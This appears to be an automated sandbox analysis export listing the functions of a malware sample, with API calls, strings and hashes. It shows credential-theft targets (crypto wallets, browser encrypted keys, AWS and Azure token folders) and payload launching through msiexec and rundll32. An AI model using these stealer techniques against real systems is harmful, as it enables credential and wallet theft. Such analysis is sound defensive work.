                                  • Opcode ID: 1f972bd0a8eb1ba1922a69e8d1a4fd8c0159ff4990caebd5f56d1da93639940d
                                  • Instruction ID: 2998db2351e3741054e4a2e02526b4646192461ebb7ebcba8683fa52f1121d24
                                  • Opcode Fuzzy Hash: 1f972bd0a8eb1ba1922a69e8d1a4fd8c0159ff4990caebd5f56d1da93639940d
                                  • Instruction Fuzzy Hash: 8D129C72910118AAEB15FB90DE92FEEB778BF64300F50459AF10672491EF742F49CB62
                                  Function 00A88320 Relevance: 28.2, APIs: 11, Strings: 5, Instructions: 196registryCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00A8A740: lstrcpy.KERNEL32(00A90E17,00000000), ref: 00A8A788
                                  • RegOpenKeyExA.ADVAPI32(00000000,0068B848,00000000,00020019,00000000,00A905B6), ref: 00A883A4
                                  • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00A88426
                                  • wsprintfA.USER32 ref: 00A88459
                                  • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00A8847B
                                  • RegCloseKey.ADVAPI32(00000000), ref: 00A8848C
                                  • RegCloseKey.ADVAPI32(00000000), ref: 00A88499
                                    • Part of subcall function 00A8A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00A8A7E6
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                  • Associated: 00000000.00000002.1297776705.0000000000A70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000CBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000CCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000E58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F33000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298376068.0000000000F6F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298508561.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298529738.000000000110B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseOpenlstrcpy$Enumwsprintf
                                  • String ID: - $%s\%s$(h$?$hh
                                  • API String ID: 3246050789-1147243618
                                  • Opcode ID: fd25d5ed7e29af2906a398452a1fbd04f7f6fd5fcc16bdb84ed3215822a8c316
                                  • Instruction ID: d7de036844349be97e2e378ee6d80acb6f051ae509f54b582fe9afa3b9534a92
                                  • Opcode Fuzzy Hash: fd25d5ed7e29af2906a398452a1fbd04f7f6fd5fcc16bdb84ed3215822a8c316
                                  • Instruction Fuzzy Hash: 52812B71910118ABEB24EB50CD91FEEB7B8FF18700F4086D9E149A6180DF75AB85CFA1
                                  Function 00A7C990 Relevance: 24.9, APIs: 13, Strings: 1, Instructions: 384filestringCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00A8A740: lstrcpy.KERNEL32(00A90E17,00000000), ref: 00A8A788
                                    • Part of subcall function 00A8A920: lstrcpy.KERNEL32(00000000,?), ref: 00A8A972
                                    • Part of subcall function 00A8A920: lstrcat.KERNEL32(00000000), ref: 00A8A982
                                    • Part of subcall function 00A8A8A0: lstrcpy.KERNEL32(?,00A90E17), ref: 00A8A905
                                    • Part of subcall function 00A8A9B0: lstrlen.KERNEL32(?,006888B8,?,\Monero\wallet.keys,00A90E17), ref: 00A8A9C5
                                    • Part of subcall function 00A8A9B0: lstrcpy.KERNEL32(00000000), ref: 00A8AA04
                                    • Part of subcall function 00A8A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00A8AA12
                                  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,0068D1D0,00000000,?,00A9144C,00000000,?,?), ref: 00A7CA6C
                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 00A7CA89
                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 00A7CA95
                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00A7CAA8
                                  • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00A7CAD9
                                  • StrStrA.SHLWAPI(?,0068D200,00A90B52), ref: 00A7CAF7
                                  • StrStrA.SHLWAPI(00000000,0068D320), ref: 00A7CB1E
                                  • StrStrA.SHLWAPI(?,0068DA20,00000000,?,00A91458,00000000,?,00000000,00000000,?,00688AB8,00000000,?,00A91454,00000000,?), ref: 00A7CCA2
                                  • StrStrA.SHLWAPI(00000000,0068DB40), ref: 00A7CCB9
                                    • Part of subcall function 00A7C820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00A7C871
                                    • Part of subcall function 00A7C820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00A7C87C
                                  • StrStrA.SHLWAPI(?,0068DB40,00000000,?,00A9145C,00000000,?,00000000,00688BA8), ref: 00A7CD5A
                                  • StrStrA.SHLWAPI(00000000,00688A68), ref: 00A7CD71
                                    • Part of subcall function 00A7C820: lstrcat.KERNEL32(?,00A90B46), ref: 00A7C943
                                    • Part of subcall function 00A7C820: lstrcat.KERNEL32(?,00A90B47), ref: 00A7C957
                                    • Part of subcall function 00A7C820: lstrcat.KERNEL32(?,00A90B4E), ref: 00A7C978
                                  • lstrlen.KERNEL32(00000000), ref: 00A7CE44
                                  • CloseHandle.KERNEL32(00000000), ref: 00A7CE9C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                  • Associated: 00000000.00000002.1297776705.0000000000A70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000CBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000CCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000E58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F33000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298376068.0000000000F6F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298508561.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298529738.000000000110B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                                  • String ID:
                                  • API String ID: 3744635739-3916222277
                                  • Opcode ID: 65c397d64d33ccfcb4722585d58739db6a7c60c6d9f81c5a795a7a510f6c2e57
                                  • Instruction ID: 8e8fc0f69ce80d5d42fd6641069c7d353a9d53cbeac5231d169c8ff9ce60736f
                                  • Opcode Fuzzy Hash: 65c397d64d33ccfcb4722585d58739db6a7c60c6d9f81c5a795a7a510f6c2e57
                                  • Instruction Fuzzy Hash: 4AE1EE72D10108ABEB15FBA4DD96FEEB778AF64300F40415AF10677191EF346A4ACB62
                                  Function 00A84280 Relevance: 23.0, APIs: 11, Strings: 2, Instructions: 204stringCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00A88DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00A88E0B
                                  • lstrcat.KERNEL32(?,00000000), ref: 00A842EC
                                  • lstrcat.KERNEL32(?,0068EA78), ref: 00A8430B
                                  • lstrcat.KERNEL32(?,?), ref: 00A8431F
                                  • lstrcat.KERNEL32(?,0068D038), ref: 00A84333
                                    • Part of subcall function 00A8A740: lstrcpy.KERNEL32(00A90E17,00000000), ref: 00A8A788
                                    • Part of subcall function 00A88D90: GetFileAttributesA.KERNEL32(00000000,?,00A71B54,?,?,00A9564C,?,?,00A90E1F), ref: 00A88D9F
                                    • Part of subcall function 00A79CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00A79D39
                                    • Part of subcall function 00A799C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00A799EC
                                    • Part of subcall function 00A799C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00A79A11
                                    • Part of subcall function 00A799C0: LocalAlloc.KERNEL32(00000040,?), ref: 00A79A31
                                    • Part of subcall function 00A799C0: ReadFile.KERNEL32(000000FF,?,00000000,00A7148F,00000000), ref: 00A79A5A
                                    • Part of subcall function 00A799C0: LocalFree.KERNEL32(00A7148F), ref: 00A79A90
                                    • Part of subcall function 00A799C0: CloseHandle.KERNEL32(000000FF), ref: 00A79A9A
                                    • Part of subcall function 00A893C0: GlobalAlloc.KERNEL32(00000000,00A843DD,00A843DD), ref: 00A893D3
                                  • StrStrA.SHLWAPI(?,0068E970), ref: 00A843F3
                                  • GlobalFree.KERNEL32(?), ref: 00A84512
                                    • Part of subcall function 00A79AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00A74EEE,00000000,00000000), ref: 00A79AEF
                                    • Part of subcall function 00A79AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00A74EEE,00000000,?), ref: 00A79B01
                                    • Part of subcall function 00A79AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00A74EEE,00000000,00000000), ref: 00A79B2A
                                    • Part of subcall function 00A79AC0: LocalFree.KERNEL32(?,?,?,?,00A74EEE,00000000,?), ref: 00A79B3F
                                  • lstrcat.KERNEL32(?,00000000), ref: 00A844A3
                                  • StrCmpCA.SHLWAPI(?,00A908D1), ref: 00A844C0
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00A844D2
                                  • lstrcat.KERNEL32(00000000,?), ref: 00A844E5
                                  • lstrcat.KERNEL32(00000000,00A90FB8), ref: 00A844F4
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                  • Associated: 00000000.00000002.1297776705.0000000000A70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000CBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000CCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000E58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F33000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298376068.0000000000F6F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298508561.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298529738.000000000110B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                  • String ID: ph$xh
                                  • API String ID: 3541710228-918046377
                                  • Opcode ID: 1a3b57d83836e04a48346f522a7f8a92fe57152ce59651629eb55bcd261f6e32
                                  • Instruction ID: 8cc0ae53aff5f96a35cc57466ed93f9d46d50ffad73d6015434057934997fca0
                                  • Opcode Fuzzy Hash: 1a3b57d83836e04a48346f522a7f8a92fe57152ce59651629eb55bcd261f6e32
                                  • Instruction Fuzzy Hash: BD7156B6900208BBDB14FBA4DD85FEE73B9BB98300F048599F60997181EA35DB45CF91
                                  Function 00A89010 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 184COMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00A8906C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                  • Associated: 00000000.00000002.1297776705.0000000000A70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000CBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000CCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000E58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F33000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298376068.0000000000F6F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298508561.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298529738.000000000110B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CreateGlobalStream
                                  • String ID: image/jpeg$ph
                                  • API String ID: 2244384528-2801389656
                                  • Opcode ID: d63b3cb6db139a1069f9802a0df5986cbcf877eace2f54afcea0625c3886978a
                                  • Instruction ID: 8469e79d3119dda7e86d065fe105b126b71bedf0edf3c61b4e30893c8c99051e
                                  • Opcode Fuzzy Hash: d63b3cb6db139a1069f9802a0df5986cbcf877eace2f54afcea0625c3886978a
                                  • Instruction Fuzzy Hash: EB71F1B1910208AFDB04EFE4DD89FEEB7B9BF48700F148618F555A7290EB35A905CB61
                                  Function 00A84D70 Relevance: 22.6, APIs: 6, Strings: 9, Instructions: 123stringCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00A88DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00A88E0B
                                  • lstrcat.KERNEL32(?,00000000), ref: 00A84DB0
                                  • lstrcat.KERNEL32(?,\.azure\), ref: 00A84DCD
                                    • Part of subcall function 00A84910: wsprintfA.USER32 ref: 00A8492C
                                    • Part of subcall function 00A84910: FindFirstFileA.KERNEL32(?,?), ref: 00A84943
                                  • lstrcat.KERNEL32(?,00000000), ref: 00A84E3C
                                  • lstrcat.KERNEL32(?,\.aws\), ref: 00A84E59
                                    • Part of subcall function 00A84910: StrCmpCA.SHLWAPI(?,00A90FDC), ref: 00A84971
                                    • Part of subcall function 00A84910: StrCmpCA.SHLWAPI(?,00A90FE0), ref: 00A84987
                                    • Part of subcall function 00A84910: FindNextFileA.KERNEL32(000000FF,?), ref: 00A84B7D
                                    • Part of subcall function 00A84910: FindClose.KERNEL32(000000FF), ref: 00A84B92
                                  • lstrcat.KERNEL32(?,00000000), ref: 00A84EC8
                                  • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00A84EE5
                                    • Part of subcall function 00A84910: wsprintfA.USER32 ref: 00A849B0
                                    • Part of subcall function 00A84910: StrCmpCA.SHLWAPI(?,00A908D2), ref: 00A849C5
                                    • Part of subcall function 00A84910: wsprintfA.USER32 ref: 00A849E2
                                    • Part of subcall function 00A84910: PathMatchSpecA.SHLWAPI(?,?), ref: 00A84A1E
                                    • Part of subcall function 00A84910: lstrcat.KERNEL32(?,0068F500), ref: 00A84A4A
                                    • Part of subcall function 00A84910: lstrcat.KERNEL32(?,00A90FF8), ref: 00A84A5C
                                    • Part of subcall function 00A84910: lstrcat.KERNEL32(?,?), ref: 00A84A70
                                    • Part of subcall function 00A84910: lstrcat.KERNEL32(?,00A90FFC), ref: 00A84A82
                                    • Part of subcall function 00A84910: lstrcat.KERNEL32(?,?), ref: 00A84A96
                                    • Part of subcall function 00A84910: CopyFileA.KERNEL32(?,?,00000001), ref: 00A84AAC
                                    • Part of subcall function 00A84910: DeleteFileA.KERNEL32(?), ref: 00A84B31
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                  • Associated: 00000000.00000002.1297776705.0000000000A70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000CBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000CCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000E58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F33000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298376068.0000000000F6F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298508561.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298529738.000000000110B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                  • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                                  • API String ID: 949356159-974132213
                                  • Opcode ID: 49ef2594cc85786d6be43b8d596cd6772f4ae68899c3a0157fd69125efecefa8
                                  • Instruction ID: 770f8f48ea61b401d6599a3d67d0c6c451e4e49983e0cf5bd66bcf3524701fe8
                                  • Opcode Fuzzy Hash: 49ef2594cc85786d6be43b8d596cd6772f4ae68899c3a0157fd69125efecefa8
                                  • Instruction Fuzzy Hash: CB41D37AA4020476DB14F770DD47FED3278AB64740F004894B28A620C1FEB55BC88B92
                                  Function 00A812D0 Relevance: 21.3, APIs: 11, Strings: 1, Instructions: 310COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                  • Associated: 00000000.00000002.1297776705.0000000000A70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000CBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000CCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000E58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F33000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298376068.0000000000F6F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298508561.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298529738.000000000110B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpylstrlen
                                  • String ID: h
                                  • API String ID: 2001356338-961787225
                                  • Opcode ID: 22b8648300fefdf4db1788d8c71dec280e613c111caca4d0a63cab6cf1d3b15f
                                  • Instruction ID: fee26e23cf4c2acf8b83b27b6b981a9f97fe1aa9b381df4837cde69cbe7e9a12
                                  • Opcode Fuzzy Hash: 22b8648300fefdf4db1788d8c71dec280e613c111caca4d0a63cab6cf1d3b15f
                                  • Instruction Fuzzy Hash: D6C173B5E002199BCB14FF60DD89FEE7778BB64304F004599F50AA7241EE74AA85CFA1
                                  Function 00A82E30 Relevance: 19.7, APIs: 3, Strings: 8, Instructions: 469COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00A8A740: lstrcpy.KERNEL32(00A90E17,00000000), ref: 00A8A788
                                  • ShellExecuteEx.SHELL32(0000003C), ref: 00A831C5
                                  • ShellExecuteEx.SHELL32(0000003C), ref: 00A8335D
                                  • ShellExecuteEx.SHELL32(0000003C), ref: 00A834EA
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                  • Associated: 00000000.00000002.1297776705.0000000000A70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000CBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000CCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000E58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F33000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298376068.0000000000F6F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298508561.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298529738.000000000110B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExecuteShell$lstrcpy
                                  • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                                  • API String ID: 2507796910-3625054190
                                  • Opcode ID: 1c3e3eb3c446d65fcfd4a14eed5f09678b7fd5785b967d9b668faa7cda3fd824
                                  • Instruction ID: 94ae89612e48441531a644a6383e134835388ac2cca98824df2ba37db5312736
                                  • Opcode Fuzzy Hash: 1c3e3eb3c446d65fcfd4a14eed5f09678b7fd5785b967d9b668faa7cda3fd824
                                  • Instruction Fuzzy Hash: 15120271D101189AEB19FBA0DE92FEDB778AF24300F50455AF50676191EF382B4ACF62
                                  Function 00A852C0 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 139stringCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00A8A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00A8A7E6
                                    • Part of subcall function 00A76280: InternetOpenA.WININET(00A90DFE,00000001,00000000,00000000,00000000), ref: 00A762E1
                                    • Part of subcall function 00A76280: StrCmpCA.SHLWAPI(?,0068F400), ref: 00A76303
                                    • Part of subcall function 00A76280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00A76335
                                    • Part of subcall function 00A76280: HttpOpenRequestA.WININET(00000000,GET,?,0068EC88,00000000,00000000,00400100,00000000), ref: 00A76385
                                    • Part of subcall function 00A76280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00A763BF
                                    • Part of subcall function 00A76280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00A763D1
                                    • Part of subcall function 00A8A8A0: lstrcpy.KERNEL32(?,00A90E17), ref: 00A8A905
                                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00A85318
                                  • lstrlen.KERNEL32(00000000), ref: 00A8532F
                                    • Part of subcall function 00A88E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00A88E52
                                  • StrStrA.SHLWAPI(00000000,00000000), ref: 00A85364
                                  • lstrlen.KERNEL32(00000000), ref: 00A85383
                                  • lstrlen.KERNEL32(00000000), ref: 00A853AE
                                    • Part of subcall function 00A8A740: lstrcpy.KERNEL32(00A90E17,00000000), ref: 00A8A788
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                  • Associated: 00000000.00000002.1297776705.0000000000A70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000CBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000CCE000.00000040.00000001.01000000.00000003.sdmpDownload File
